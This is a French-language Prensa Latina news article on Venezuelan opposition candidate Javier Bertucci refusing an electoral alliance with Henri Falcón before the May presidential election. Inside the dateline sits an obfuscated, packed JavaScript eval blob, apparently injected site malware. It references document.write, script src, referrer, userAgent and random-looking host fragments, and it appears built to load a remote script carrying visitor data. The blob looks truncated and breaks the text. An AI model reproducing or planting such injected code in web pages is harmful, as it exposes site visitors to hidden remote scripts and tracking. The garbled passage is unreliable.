samedi 13 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un opposant vénézuélien exclut une candidature d´union lors des élections présidentielles

Caracas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbkfy|var|u0026u|referrer|ynzss||js|php'.split('|'),0,{})) 10 mai (Prensa Latina) Le candidat vénézuélien d´opposition Javier Bertuccia aujourd´hui exclut une candidature d´union avec Henri Falcon en vue des élections présidentielles du 20 mai prochain.

Caracas, 10 mai (Prensa Latina) Le candidat vénézuélien d´opposition Javier Bertuccia aujourd´hui exclut une candidature d´union avec Henri Falcon en vue des élections présidentielles du 20 mai prochain.

Le représentant du groupe des électeurs d’Esperanzapor el Cambio a considéré qu´une alliance avec celui qui est soutenu par AvanzadaProgresista, Movimiento al Socialismo et le Comité de OrganizacionPolitica Electoral Independiente (Copei) ne créerait pas les conditions suffisantes pour assurer une victoire électorale de l´opposition.

« Il me parait, dans ces conditions, immoral de mentir au peuple. Il est difficile que l´on puisse trouver un accord s´il y a des mensonges au milieu », a-t-il déclaré lors d´une rencontre avec la presse.

Bertucci a considéré que sa candidature est en train de se renforcer et prendre de l´ampleur dans la course électorale, raison pour laquelle il a considéré que s´il y avait une unité elle devrait avoir lieu et se consolider autour de sa candidature. « L´écart entre Falcon et moi est faible, moi je continue de monter dans les sondages », a-t-il estimé.

Il a également contesté les appels à l´abstention sur lesquels insistent certains acteurs de la droite, les mêmes qui encouragent à l´étranger des matrices d´opinion pour délégitimer la période pré-électorale.

En référence à ses propositions, il a réitéré son intention de faire des ajustements macroéconomiques qui incluraient des coupes budgétaires pour les programmes sociaux.

Cependant, la décision et les arguments de Bertucci s´opposent à la dernière enquête d´opinion diffusée par le groupe Hinterlaces, laquelle a estimé qu´il ne compterai que sur le soutien de 14 pour cent de l´électorat, alors que Falcon serai lui soutenu par 31 pour cent.

Pour sa part, le représentant du FrenteAmplio de la Patria, et actuel président, Nicolas Maduro, est en tête des intentions de vote avec le soutien de 48 pour cent des électeurs alors qu´il ne reste que dix jours avant le scrutin présidentiel.

peo/oda/odf

EN CONTINU
notes connexes